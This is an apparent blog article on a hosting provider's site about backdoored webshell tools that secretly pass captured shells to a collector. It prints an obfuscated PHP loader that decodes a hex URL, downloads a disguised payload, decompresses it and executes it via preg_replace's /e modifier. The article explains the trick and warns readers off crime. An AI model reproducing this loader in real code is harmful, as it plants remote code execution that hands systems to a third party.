行业动态

防御吧作为15年知名老牌域名服务商,CNNIC和CANN双认证域名注册商,已经
持续为500多万个域名提供服务,包括智能DNS/自由转移/隐私保护等服务!
揭秘网络黑吃黑产业之"后门箱子"
2020-06-22 14:10:20 【

在一些渗透测试中,往往会用到各种大马,小马,一句话,菜刀等等……但是你们有想过这些工具会存在后门吗?


何为webshell

webshell的获取一般要跟大马小马这些挂上一个√(就算是命令执行也需要shell)。webshell简单理解就是网站的一个管理程序,可以上传下载等等一系列操作,而大小马则是这个管理程序的代码。

关于后门

一般存在后门的话,所获得的shell会通过后门发送给箱子,那个箱子就是用来装shell的地方!

举个例子


error_reporting(0);

session_start();

header("Content-type:text/html;charset=utf-8");if(empty($_SESSION['api']))

$_SESSION['api']=substr(file_get_contents(

sprintf('%s?%s',pack("H*",

'687474703a2f2f377368656c6c2e676f6f676c65636f64652e636f6d2f73766e2f6d616b652e6a7067′),uniqid())),3649);

@preg_replace("~(.*)~ies",gzuncompress($_SESSION['api']),null);

?>

这里我们主要看

sprintf('%s?%s',pack("H*",'687474703a2f2f377368656c6c2e676f6f676c65636f64652e636f6d2f73766e2f6d616b652e6a7067′),uniqid())

这串代码看起来可能平平无奇,但是执行过后其实是一张箱子的图片地址,这个地址我就不放出来了,有兴趣的可以自己搭建解密!这个图片还需要调用file_get_contents函数读取图片为字符串,然后substr取3649字节之后的内容,再调用gzuncompress解压,得到真正的代码。最后调用preg_replace的修饰符e来执行恶意代码。然后,shell就被装进箱子里了。

黑吃黑是怎么形成的

其实网络安全圈子里定义一直模糊,有人兢兢业业挖洞,做src;有人背地里干违法勾当,赚黑心钱。天天在群里秀,挖洞的一部分人就会想

同样是技术,那凭什么我的付出和收入没有他做一单高?就受不住诱惑投入黑产了。殊不知在群里秀的那群人,早已喝茶去了……

极少数违法分子就觉得自己挖太危险了,重新换个思路:

提供大小马之类的工具,再写上一句免责声明,加个后门,想着坐等shell进账出售,出了事也不会被追究。毕竟后门代码一般小白还真不会去管,他们胆子大,技术差。这里奉劝萌新小白们别做事不经大脑思考,盲目炫技最后只能进去喝透心凉茶!!!

这伙人写好了后门,疯狂推广,进账,然后被抓…

“违法犯罪得事一定不能做!”

这就是黑吃黑产业链了,他们背后链接的产业咋们下期再说!

也希望各位网络安全爱好者,同行,且行且珍惜,莫做违法事!制作不易点个赞再走吧!靓仔!

#网络安全在我身边#



】【打印关闭】 【返回顶部
分享到QQ空间
分享到: 
上一篇高防服务器丢包的原因有哪些,如.. 下一篇如何迎接数字经济时代的到来?

立足首都,辐射全球,防御吧专注云防御及云计算服务15年!

联系我们

服务热线:010-56157787 ,010-56159998
企业QQ:4000043998
技术支持:010-56159998
E-Mail:800@fangyuba.com
Copyright ? 2003-2016 fangyuba. 防御吧(完美解决防御与加速) 版权所有 增值许可:京B2-20140042号
售前咨询
公司总机:4000043998 01056155355
24小时电话:010-56159998
投诉电话:18910191973
值班售后/技术支持
售后服务/财务
备案专员
紧急电话:18610088800